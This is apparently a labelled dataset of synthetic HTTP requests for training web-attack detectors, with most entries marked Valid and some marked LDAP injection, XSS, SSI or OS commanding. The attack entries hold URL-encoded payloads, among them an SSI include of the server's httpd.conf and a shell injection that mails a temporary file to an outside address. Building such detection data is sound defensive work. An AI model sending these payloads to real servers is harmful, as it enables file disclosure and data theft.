Transfer-Encoding: compress
Upgrade: Rdo/4.6, As7e/2.7, wanot/9.0, d3it/2.0
Warning: 265 68.227.212.166:78 "moawtiltates" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 61683738419
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rRxonemsereRy5=ytjyprocessing-instructionn&6poa=861402&rEtsiattOyihh=tdhsxav t exEn|>uy&mFesstoiws=sksot&YbyNzIJhome=eleopteh7edfNnsDt&npcEwuru=pzasenhdt

End - Id: 34924
Start - Id: 12692
class: Valid
GET /DvDteamS/2i4zlEO0Xxjy56/ubN.aspx? HTTP/1.1
Host: 199.222.48.76:0
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.9, gzip;q=0.2, compress, compress;q=0.9
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 141.142.203.127
Cookie: 2fyii5zi=aajr ;8seOioDetaictwf=dphuc;tetcwindow.openXn_=29655929
Cookie2: $Version="994"
Date: Sat, 30 May 09 21:44:39 UTC
ETag: W/"NBz9wNb-4B9rg@Ptau"
Expect: 100-continue
From: aIsia@oetle.org
If-Modified-Since: Mon, 21 Dec 09 03:57:52 UTC
If-Unmodified-Since: Wed, 18 Mar 09 02:42:59 CET
If-Match: *
If-None-Match: "Y2Q6rWgTT@BZEYHg2@y"
If-Range: Fri, 22 May 09 11:37:30 CET
Max-Forwards: 24
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM Z2huZTZwcmlldG84d2Vpc2VhZDNpZ25lZmhmZWVlbHRlZGxhOGFn
Authorization: Ss5thm wpREcn=i9m5bl
Range: 123920-
Referer: /dsln/aaTD/ml7nOcec/ratn.asmx
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 8.1; dE-hE; rv:6.1.9) Gecko/80284581
UA-CPU: Sparc
UA-Disp: 945,8372,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 072x109
Via: HTTP/4.9 www.oLpY.js:1
Transfer-Encoding: gzip
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 721 10.212.150.245 "ekoIqaa0ul" 
X-Forwarded-For: 16.208.183.253
X-Serial-Number: 91220427481224
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12692
Start - Id: 37922
class: LdapInjection
GET /s7aovsh/o2YqU4H/attas/mZeaoa2a8jijeRdrE/MNTRMJUJXconnect95/nnonR0ecJlRanrslC/rAhactmsvVthflEihE/dxrnPabt2aevhlweys/qhutqghFdd/u0VryxkXkstdin/r@xeD8o_WE-6y27eLS4M/j8gTXpositioninLuL.js?inhttpQzA0na=1257136&etgshec9eirtr=0hnJlK8Z&elnnyeaiore=sr6xuoeUhse&o1tli2=246&tbhnjbodjpdd7h=%29%28%7C+%28displayName%3Dhad*%29+%28name++++%3Dhad*++%29%28++mail%3Dhad*++%29&w43vito9l=ai%2Fo2+&eoinSt=ie&eclihcrIearera=tbha6+hoddlheqb%2Fsc&bhlsydt=YvbscriptemaetmaeaZ%5Dt&notetyt=50232863&eeett=50091&Iari=322233411&55lt8=skd3edysro HTTP/1.1
Host: 133.119.83.118
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 68.144.9.61
Cookie: henEatxs=yM-e.mwS0.;g1y3hhBLUoaadmin=reeo;hyqteuapoog=27;agh0rdfdKnaete=9739
Cookie2: $Version="988"
Date: Thu, 28 Oct 04 11:42:13 UTC
ETag: W/"soqXkoKH3wNfz3Lwxq"
Expect: dtawu=4tsB
From: ssir@wcooTie.net
If-Modified-Since: Sun, 02 Mar 08 16:07:36 UTC
If-Unmodified-Since: Sat, 30 Jan 10 19:16:29 UTC
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: "rmUzG-z4owfuX9cIyerf"
Max-Forwards: 6303
MIME-Version: 2.1
Pragma: Ea=v
Proxy-Authorization: vLiie9 isIdet=nyae4rtc
Authorization: Basic Y3R0cjpvc3RpbDY=
Range: 55502-651
Referer: http://www.xyan.fr/srnsgcge/egoamul/lo1Wy3as.tar
TE: trailers,gzip,gzip
Trailer: TE
User-Agent: Angcntu9toBsd
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: tTeb/3.4 www.lhOntHy.js, FTP/3.6 150.27.48.170, 5.9 www.NahDl.shtml
Transfer-Encoding: Hp0gR; yEri=enneCt
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 94.140.32.18
X-Serial-Number: 03021
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37922
Start - Id: 47144
class: XSS
GET /atPtodmvtatne/zEuriddfd/3itSst8hshmrs6/paerr5/xjokmh/eIsihlsteo6m/@f/sOeleicntonserAoee81.htm?Acrherdze=aWhDsT&ye0nuinmt2Reh=eTNn8xnrw+lts%26a&eaelgowdtrto=%3Cdiv+++++style%3D++++%22+++++behaviour%3A+++url%28%5Bhttp%3A%2F%2Fwww.el.com%2Fscript%2Fnu.mspx%5D%29%3B+++%22+++%3E HTTP/1.1
Host: www.wttroc7b.de
Connection: close
Accept: */*;q=0.3
Accept-Charset: euc-kr;q=0.1, x-mac-chinesesimp;q=0.7, iso-10646-ucs-2, iso-8859-1;q=0.6, windows-1254
Accept-Encoding: gzip, compress, deflate;q=0.1, gzip;q=0.8, identity
Accept-Language: *
Cache-Control: min-fresh=32763
Client-ip: 194.231.176.241
Cookie: ute5yEnhb=Otmde;5hcee=aef70;6jnefkhmly=2eaul;nxeeer4eeliei=en;BSwtco6fmh=et@8vahonuEi0os
Cookie2: $Version="9"
Date: Wed, 09 May 07 14:24:11 UTC
ETag: W/"h8GIdQBR_P5h.4Cev5X"
Expect: 100-continue
From: xeliaGtt@ccieug.de
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Mon, 27 Apr 09 04:33:52 GMT
If-Match: *
If-None-Match: "UdGQgBJJXIMgwNCtTiI6"
If-Range: "jJzAUVFXaY6WV9J_Gu"
Max-Forwards: 2
MIME-Version: 6.6
Pragma: oex=8imwuea
Proxy-Authorization: Digest nc=e04736F8
Authorization: NTLM bnJ0MHUzNGkzYjVhaXZyYXdlY29sOXJvZGlvbnNhc290b3Jscw==
Range: 9848-585788,73810-,9-
Referer: /Ckvrt.mpg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 2.5; Mt-s0; rv:5.8.3) Gecko/01692181
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: FTP/9.8 www.yyniHem.shtml, 1.9 49.41.27.228, 8.8 151.56.170.120:729
Transfer-Encoding: deflate
Upgrade: oslis0/7.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 77.180.133.237
X-Serial-Number: 54001451967
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47144
Start - Id: 3962
class: Valid
PUT /nCnpbexfoodd1reei/za/ngkXe5W6a8f.3nYTm/noFp/t3shDKnwJHK6kK1sqKD/85/tiheoytaoTn/n51BEx91gYm_K/2Nolyle5/n.e/oopfhE3rdtId.msf? HTTP/1.1
Content-Length: 155
Content-Language: abesrmv,gndggAa,nshNeu
Content-Encoding: identity
Content-Location: /ittnuo/oejonrae.mdb
Content-MD5: d3RuZW53Z3hvVDBoYUFpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Aug 06 08:49:39 GMT
Last-Modified: Sat, 11 Jul 09 05:58:51 GMT
Host: 66.20.196.177
Connection: oeeti
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 52ceeko-arnwaas;q=0.0, y-iyrb, szepTsr-5a0M, o2aE-LHl
Cache-Control: t5o='tge6'
Client-ip: 97.219.209.5
Cookie: demt=5950161;turaopten=77;dmTns0adg=smmeUuo6VcK;APVo=03950;bx3aaio=mhae5t
Cookie2: $Version="3"
Date: Sun, 31 Jan 10 09:24:25 GMT
ETag: "cRPrR_WMKHJ7ipmhoi"
Expect: rd0e
From: nlsirS@iuLqmfser.st
If-Modified-Since: Wed, 02 May 07 16:27:36 CET
If-Unmodified-Since: Wed, 09 Apr 08 05:02:59 CET
If-Match: "CkGHfzZbSy9sgrd5"
If-None-Match: "rqinvu6@k4fmNeq8bfD"
If-Range: "mdV@Om2a6qguKGv"
Max-Forwards: 7970
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="yoehanfr"
Authorization: Basic YXdxczpkYmhqZWk=
Range: -1776
Referer: /DnhoMenn.mpeg
TE: trailers,gzip;q=0.3,deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: urrygTs3/7.3
UA-CPU: Sparc
UA-Disp: 9460,597,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6900x1160
Via: ennd/0.5 173.107.206.79:640, HTTP/4.7 170.86.87.110, TzM3/0.9 www.obysmgee.shtml
Transfer-Encoding: gzip
Upgrade: tnoc/2.8, twh/6.6, d0clah/7.2
Warning: 029 www.TasA.js "noEv8wnrwRfeseqNeptc" "Sat, 01 Nov 08 03:38:50 CET"
X-Forwarded-For: 152.216.247.81
X-Serial-Number: 194828763
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cioer7mao=903350&acTPDar=eara+o(elIm&oufuheetisGoma=9&uivmstotAmpn=eboot.init powiframe3rsu&dY9D5FrOlikea3having=8&hwN=8i&t1Hnitea7oeirq=45185557&ro=31

End - Id: 3962
Start - Id: 13882
class: Valid
GET /atenh0geeBoj2pcso/isac4axlacamqh6nuwj/oP5op0@S/e4vXh9zo2M/z8t80D0QDSXD9xRJ/tBarmavi/emV6ofbwL_9jS.js?Fyb_=v%3DgsamdzniudiTtOe&drle6m=%5Caccess_logxhlfio&pe0=7697391999&systemMLurJTRlp=vbscriptq&idprends=6824769&x2etad=tjyseiot%3Eqaai&pre7ise=339634&K6iResrihrro=shbf0&dfdg=e+l&eeFYt23=tobjecthinclude&sEWil2oanY=3 HTTP/1.0
Host: www.7rmrhssc.net
Connection: Maeltohn
Accept: image/*
Accept-Charset: isiri-3342
Accept-Encoding: *;q=0.4
Accept-Language: Ssbto-at;q=0.3, oetibw-s, nrttc-Oizas7ry;q=0.4
Cache-Control: ydreiO=ysdinnet
Client-ip: 5.228.57.192
Cookie: @RPzO0Zqvbscriptv=o5ojeoqomktfee3h0;husseemhpbe=itUtKesohf~;hiso=(t@;f5zs=aIjt droonM >o?
Cookie2: $Version="2"
Date: Sat, 29 Aug 09 06:51:44 GMT
ETag: W/"UzkU53@-de6bwowOH7ON"
Expect: i9xomotu
From: aopeat@lwiRaar.be
If-Modified-Since: Thu, 24 Apr 08 22:39:37 GMT
If-Unmodified-Since: Sat, 20 Nov 04 15:33:30 GMT
If-Match: "38YJiAfmgDvjELA"
If-None-Match: *
If-Range: Mon, 21 May 07 24:39:55 UTC
Max-Forwards: 0363
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: 69sr aeSoonsr=ixten
Authorization: Basic dHVkb0U6YU13ZA==
Range: -52,788-774
Referer: /aarId/hsIUd/qinesnt/WAnt.jpeg
TE: deflate,trailers,trailers
Trailer: Expect
User-Agent: ct92gebpeshraoi9Onw
UA-CPU: Sparc
UA-Disp: 4060,2972,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7739x7906
Via: 8.2 231.49.190.58, ps6ka/7.3 www.vndirHse.png, FTP/6.9 5.142.3.228
Transfer-Encoding: eEeAur; nkhe=hicxooka
Upgrade: d3bfi/2.4, EhWrnN/9.4
Warning: 098 16.209.158.37 "jtcOeZythsytt9zaQlpa" "Sat, 23 Jul 05 18:39:08 GMT"
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 02052575004924
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13882
Start - Id: 4099
class: Valid
PUT /0nttafitxR/m1D-xfWdQZhcvBMMzl/PLSMm1vb/orvnnpgglDrasuacar/h-tmpRzdiv.gif? HTTP/1.0
Content-Length: 126
Content-Language: Gevoj,s,nmUdnRge
Content-Encoding: deflate
Content-Location: http://r1ae0epo.org/ieners.tiff
Content-MD5: ZW5paDhyYXVzZWRkY2Vlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 14 Mar 08 24:36:48 UTC
Last-Modified: Sat, 15 Apr 06 04:57:47 UTC
Host: www.riiesnon.fr:80
Connection: keep-alive
Accept: video/*;q=0.7, text/*;q=0.0, audio/basic
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, deflate;q=0.5, deflate;q=0.2, compress, compress
Accept-Language: *
Cache-Control: max-age=5418
Client-ip: 155.2.169.84
Cookie: heiadlg=883;VwgetiRrtP=den 4E nj6iuo
Cookie2: $Version="8"
Date: Sun, 27 Jun 04 09:42:07 GMT
ETag: "W1OmfFVb3K-HSF1Amb"
Expect: 100-continue
From: wea9aE@trxal7nf.gov
If-Modified-Since: Fri, 01 Dec 06 22:05:23 UTC
If-Unmodified-Since: Sat, 07 Feb 09 22:06:00 GMT
If-Match: "nD2D3IxQXiKY4sua5L"
If-None-Match: *
If-Range: *
Max-Forwards: 9416
MIME-Version: 8.5
Pragma: th=qj3ue
Proxy-Authorization: Basic eXN4bnRuOkV0eGE=
Authorization: NTLM ZmljSEVpaHl0V3dibHlpbmVheGN0eWlVbmloZk5vbnN0ZWVJcHRzYXVvbml6Yw==
Range: 92-96456,-88312
Referer: http://iobhFh.de/lt1bhh.bin
TE: trailers
Trailer: Accept-Encoding
User-Agent: orsesdopmv/7.0
UA-CPU: MIPS
UA-Disp: 4996,3715,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1301x1133
Via: 2tattb/0.0 158.150.187.167, FTP/4.3 172.153.4.28, HTTP/0.4 186.53.126.83
Transfer-Encoding: eeEv; reoipig=Yhahuan
Upgrade: en0l/7.9, tig/3.9, lrcze/8.8, Nyeket/1.1, tegi/0.5
Warning: 154 253.72.13.96 "odslseae3oO1ilHaa" "Thu, 11 Jun 09 01:26:19 GMT"
X-Forwarded-For: 68.146.106.65
X-Serial-Number: 8957401
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

gfticSxscepqagv=qeSeair9natec&teteElsolcpt=M)&hc2-4FC=347&tse9pol2nl=Kn&otdthmamr3dr=04904&scc8g5=laCRFDAw&maer=ainaaopennan

End - Id: 4099
Start - Id: 27943
class: Valid
GET /iertrhheoUydwEuei.exe?eonbcosTelr8e=uall69&eeGyW6eengh4t=gieM9l&1poA=86066&ohedenr=likeidr&a4=tcQwp5tfal%3Et&GJ7TgIWruG=282681&oinaetgzydao=4110757&iango86Teo=924&d4cS8fy=8&piOiittbtogeeo=21&radegf=Xti++en+drd&tatbst=gfktzETb%403&etbnmlxw1fEtina=o%5Drtochildbys&BqQO3XPE=lsit2c6psfmt HTTP/1.0
Host: 157.142.83.51:80
Connection: DRiylle
Accept: video/*, video/*;q=0.1
Accept-Charset: cp-932;q=0.2, iso-10646-ucs-2, iso-8859-8;q=0.0, ks_c_5601-1987;q=0.5
Accept-Encoding: *
Accept-Language: pn-7y
Cache-Control: a=nv
Client-ip: 115.171.171.121
Cookie: si3ludieegsq=6915179;een2yGr9L=tpWuca(oiidhn;ePeavjdds=00267;sn8=94943;avhHpzemO=7Ze;m3E=a5Ze-qK
Cookie2: $Version="5"
Date: Thu, 05 Aug 04 06:37:11 GMT
ETag: "ioGj.SWMOaK1l.Z4w"
Expect: dun4h
From: aclt@ntyaoohns.cz
If-Modified-Since: Mon, 02 Feb 09 24:35:45 UTC
If-Unmodified-Since: Mon, 22 Oct 07 14:01:25 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 148
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: aseiIS htdyI=sragn
Authorization: NTLM ck5lcWV1aWljbHJuaTR0bmNqOGh3bncwcHNncndoZmhyc2RtbWVlcG5hbGlp
Range: 70-8,-3
Referer: /rntffnL/rusr.jsp
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/3.1 (X11; U; Linux i386 2.2; ur-to; rv:3.3.3) Gecko/42546298
UA-CPU: Sparc
UA-Disp: 666,785,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0093x2454
Via: ton/9.7 www.enN9.jpeg:30, FTP/9.1 0.20.189.171
Transfer-Encoding: gzip
Upgrade: hrdi/7.3, pbnr/9.0, Etitb/6.6, cut/3.8
Warning: 832 59.92.226.57 "4ttWsncayb0" "Thu, 06 Dec 07 08:46:18 CET"
X-Forwarded-For: 122.177.179.211
X-Serial-Number: 0343313955919
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27943
Start - Id: 4456
class: Valid
POST /BNwSx.ZiframeX5AB@x/gta8/5igq3zWcaidTgocwai/lphXFM.yzSLKF.NxEX/tvN9MmX9aFvv/Sqo@/r4ucirnaEtotae0sreA.jpg? HTTP/1.1
Content-Length: 68
Content-Language: s7c0
Content-Encoding: identity
Content-Location: /tedSf8/l4reUhe/m7sap/hunhn.css
Content-MD5: b2ZhZUFuaTBnZWh0VW4ybA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Mar 06 12:57:07 UTC
Last-Modified: Fri, 08 Feb 08 11:16:53 CET
Host: www.3htiuequI.gov:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=28398
Client-ip: 148.61.30.23
Cookie: ioiosm=nWx;vaf=heuree;Hnbn=275966523
Cookie2: $Version="52"
Date: Tue, 25 May 04 13:38:57 UTC
ETag: W/"26t8-X4ga-aU@NCwa"
Expect: t7tdehi=moea;Lo5eT7=i2dirZa
From: wdWul@dxjn.gov
If-Modified-Since: Sat, 10 May 08 12:41:39 GMT
If-Unmodified-Since: Sat, 18 Aug 07 14:34:01 UTC
If-Match: *
If-None-Match: "bZXiegKygRmJgdQy"
If-Range: "ZHf.iAXLbNZG8UgDUiJ"
Max-Forwards: 31
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM QWthNnVsbGVydGs2ZXBndHBlZTBnemJycm5hdFQ2YWV3cHRldFllczhzdG9hbg==
Authorization: Digest qop=mumm3b
Range: 64421-813,254899-
Referer: /tsmi/ce6pl5xn/oetaT/e2hora.mdb
TE: gzip
Trailer: Connection
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 4.8; pt-r3; rv:0.3.3) Gecko/00151198
UA-CPU: StrongARM
UA-Disp: 5974,926,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 421x3151
Via: FTP/5.1 www.6eefaas.shtml
Transfer-Encoding: deflate
Upgrade: ulsw/2.5, rssRS/4.4, weIr/9.2, WMmae/9.2, taa/2.0
Warning: 398 164.133.4.227 "eu2th43eiiapvpn" 
X-Forwarded-For: 11.144.91.166
X-Serial-Number: 053208446
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

mwehlo5r=oeo &ybRep=hsJbgsoundhie9rjfso&sh=aio&int=i|rrh&xhcaami=s

End - Id: 4456
Start - Id: 3223
class: Valid
GET /ievPzU2Ots7lL396k/mJ-UTTpjrEwjU9epx8C/An%uYB/eOujilR.mspx?neweeLs=uimgmis&qpANzJoNcatI7=fatys&oomsgentrvNn=181983&tamrohnteOl=TTai%40&ewuiihl2IfsEme=n HTTP/1.0
Host: www.04hwo.it
Connection: hi5tcos
Accept: video/mpeg, video/mpeg;q=0.7, video/quicktime
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: up-aWScrd3, oamO-meep;q=0.4
Cache-Control: only-if-cached
Client-ip: 229.115.192.49
Cookie: drdINojeK=375297
Cookie2: $Version="96"
Date: Wed, 23 Jan 08 14:00:23 GMT
ETag: W/"ywB8PiWMbzNKJVH5o"
Expect: 100-continue
From: ee5cc9@atzl3njm.com
If-Modified-Since: Tue, 01 May 07 07:46:56 CET
If-Unmodified-Since: Thu, 10 Aug 06 18:15:55 GMT
If-Match: "Vno8ukuz0L0bfOZN@Uje"
If-None-Match: "Lp9pl2R8gUpC_c9"
If-Range: Wed, 22 Sep 04 15:49:00 GMT
Max-Forwards: 9
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic dGVpaHM6b2lsYWRkYWk=
Authorization: Digest realm
Range: 82-228963,737536-47
Referer: /oamelb.mpeg
TE: chunked,trailers,gzip
Trailer: TE
User-Agent: Mozilla/1.3 (Machintosh; U; Mac OS X 3.6; re-ys; rv:0.8.6) Gecko/34781442
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 357x7403
Via: 4.1 93.19.127.104:017, 2.1 www.dsesHpet.js, FTP/8.0 125.177.143.49
Transfer-Encoding: gzip
Upgrade: ircioc/5.5, hzedyy/5.6, wArsli/6.7, Euo/8.2
Warning: 925 www.t1tEewa.css "iYe7tpBtm7wyjraztas" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3223
Start - Id: 39716
class: SSI
GET /ewtmPUz9/oCaq.html?eEicE5Aml6=17532138&K8l3lbodyN2h=6599173&connectcopyjW.BzX=3573&httconohhne5rri=oz%3Bl&f4jhR=%29na&o9ttsr6boyaSn=z1dsicNp7gn4aneaaL&L14GI=laLkl+elinksnode%3BatO&aErihreolmws93h=sXt&@NVnPyz2=MRyIi+-y&eianga=EAf&dcs5PoheneIs=%3C%21--%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&isHeaoitYeneHi=3&inA6ci2sNs=olr HTTP/1.0
Host: www.6N8rf.fr
Connection: 3ouer8dL
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.9, windows-1257;q=0.0, windows-1250, macintosh
Accept-Encoding: identity, deflate, identity;q=0.0, gzip
Accept-Language: EMcsens-eryaaofy;q=0.0, giies-osdovpr;q=0.6, io-rcro;q=0.6, artpo2i9-nyt8arPS;q=0.2
Cache-Control: no-store
Client-ip: 215.74.168.109
Cookie: jInnirdnirfe3g=m'divu;nudaambmnDa=eec;gsrxhw=11;domAcgu=pVBP
Cookie2: $Version="372"
Date: Tue, 28 Mar 06 23:54:19 GMT
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Fri, 11 Apr 08 17:26:22 UTC
If-Unmodified-Since: Thu, 16 Nov 06 06:34:59 UTC
If-Match: "hjtsd67YVFRVj09tjT8"
If-None-Match: "sxPKoV3rJ.qan7-7SX45"
If-Range: Sun, 29 Jan 06 07:21:27 GMT
Max-Forwards: 2811
MIME-Version: 4.8
Pragma: 1x=exora
Proxy-Authorization: Digest cnonce="d8sec"
Authorization: NTLM c3JwZU9hYWhhN3NuRThFb2ZlaGZhYWVyYVNzZXVhZ3A3
Range: 61-,98874-5,222224-
Referer: http://mepakz.gov/Ebdce3p.jpg
TE: deflate,trailers
Trailer: Host
User-Agent: sWIeywcs http://www.nbat9etb.fr
UA-CPU: x86
UA-Disp: 3264,053,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 066x3039
Via: 0.1 211.223.169.217
Transfer-Encoding: eeay; e5zjrlea=rueea
Upgrade: arMt/8.7, let/4.8
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 227.157.179.153
X-Serial-Number: 9911764547155
----: ------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39716
Start - Id: 43508
class: OsCommanding
GET /v_PbzXZ.asmx?aur6aaiudte4=niL9oto&RK.mB3acs=p8&eluFjomEdL=c+alleusrysrimgsmrp%7C+cy0+&ena=g.UNlrCT_L&ttl=oh%25lcn8slln%3Br&llsY2mu9=tsmailiOi&TOisd=81&yezi0h=23170&zfy9GIvu=tcfleo&inUbdisidm=%27+++++%3B+cat++++%2Ftmp%2Fres++mail+ie%40el.com++%3B&oeba7siVuca=oKvM-TSzi5kp HTTP/1.1
Host: 196.193.88.122
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean;q=0.2, x-mac-ce;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-age=88
Client-ip: 108.184.195.217
Cookie: Serr=nlltlgtho;peg=178412;k@2WEvQSU=lXg
Cookie2: $Version="916"
Date: Fri, 13 Jul 07 20:19:14 CET
ETag: W/"CTMBNkc9JtBstBs"
Expect: 100-continue
From: NesEau@sst3lda2e.uk
If-Modified-Since: Sat, 30 Jan 10 12:13:26 CET
If-Unmodified-Since: Mon, 18 Feb 08 01:34:13 CET
If-Match: "uXIX5BYxuGhu3CLf"
If-None-Match: "hKNgYop3QlhaF-Zrqj"
If-Range: *
Max-Forwards: 935
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: NTLM aU5lZUl0M3NubGllc2ZlR2NsaXByaWxybWVybWVib3VPYXNsaW9Z
Range: 32-61,4386-85
Referer: /yooe/ralo0ee.rar
TE: deflate,trailers
Trailer: Range
User-Agent: Mozilla/1.4 (compatible; 3eehyfaame; Mac OS X; iZdgt; snstgi; Lcjeror)
UA-CPU: MIPS
UA-Disp: 034,8508,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: HTTP/3.4 www.6aaaOs.js
Transfer-Encoding: compress
Upgrade: tlle/3.2, ouiu/2.7, 6nb/4.0, iuoaC/4.5, ioatma/4.1
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 134.201.54.76
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43508
Start - Id: 4438
class: Valid
PUT /sjRlthnw/4vrbGeuim5at7l/oj7oOli2ticvho2ot/oZmBmo/iR4BWHr@k5/osSnaSy/ho/nEnnSo2S1ae8ois4ogrv/rx4tqcsiVilg/e-qndadVb74mROnnGJ6/objectHR.VWjLtimg@gU.gif? HTTP/1.0
Content-Length: 295
Content-Language: zm,tprnht
Content-Encoding: identity
Content-Location: http://www.lciu.it/setr/dtoy/Igta53.jsp
Content-MD5: b2ExZWNobHBhODBjZWRxYw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Apr 07 09:55:50 UTC
Last-Modified: Sun, 03 Jan 10 13:45:56 UTC
Host: 41.147.153.95
Connection: eqer0iyo
Accept: video/*, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 171.193.127.138
Cookie: veeCMhrnwtwyjs=nnbfe;a6oEh=8622372;8b@ftp=38754;iuttsl=0iehxmliwh%aw;4b.a=74;0amutaarrvhhhnl=ustyleoiut3
Cookie2: $Version="774"
Date: Thu, 25 Mar 04 11:11:52 UTC
ETag: "Ivyb0W0J4BqvXqlok"
Expect: 100-continue
From: rh3qx@gsao.net
If-Modified-Since: Sat, 01 Apr 06 02:30:41 GMT
If-Unmodified-Since: Sat, 16 Apr 05 10:44:16 UTC
If-Match: "uZfg9@farve8J_GCCnJ"
If-None-Match: *
If-Range: Tue, 28 Aug 07 08:55:46 CET
Max-Forwards: 1250
MIME-Version: 9.6
Pragma: e1gxqa='heqi'
Proxy-Authorization: Digest cnonce="p1qwbnT"
Authorization: NTLM U2VpWnhyYW9lb2F0c25ydHdvYTVvZWVJUmVocjJ0dW90dA==
Range: 64421-813,254899-
Referer: /cOntmh/eiso/r7ta.bin
TE: deflate;q=0.5
Trailer: Authorization
User-Agent: Mozilla/3.9 (X11; U; SunOS sun4u 9.2; ha-5n; rv:3.8.5) Gecko/40234230
UA-CPU: MIPS
UA-Disp: 3339,068,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 604x596
Via: FTP/4.2 31.97.24.184
Transfer-Encoding: identity
Upgrade: zscdse/7.1, 1ntn/4.8, caw/0.2, nhnaei/2.6, jrla3/2.1
Warning: 774 98.7.54.149 "snI8ejlpssn" "Tue, 19 Apr 05 06:05:00 CET"
X-Forwarded-For: 9.134.134.209
X-Serial-Number: 91470301728015054
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2odQ.5_AbkpL=ent&YQgCDRZ=288&ldetehtT6tnd=688984717&rsP1TWwit=dtag9e@Qmtt&ooS6=ndUtsecdeletebid%btL&masesetkr='d&rswgeioyti=io&iigwye=uCND3j0gT&seachtnttetRe= tNrw[e'chnl9ci&uN=o'link8riktbul&ct2tot2tam=hlr6e0cht\2h~7&htpass65Wt_fP=@flfh&lrmcusA=2683&lnrIlikei8O=01&ebe8m=e1 wE

End - Id: 4438
Start - Id: 10352
class: Valid
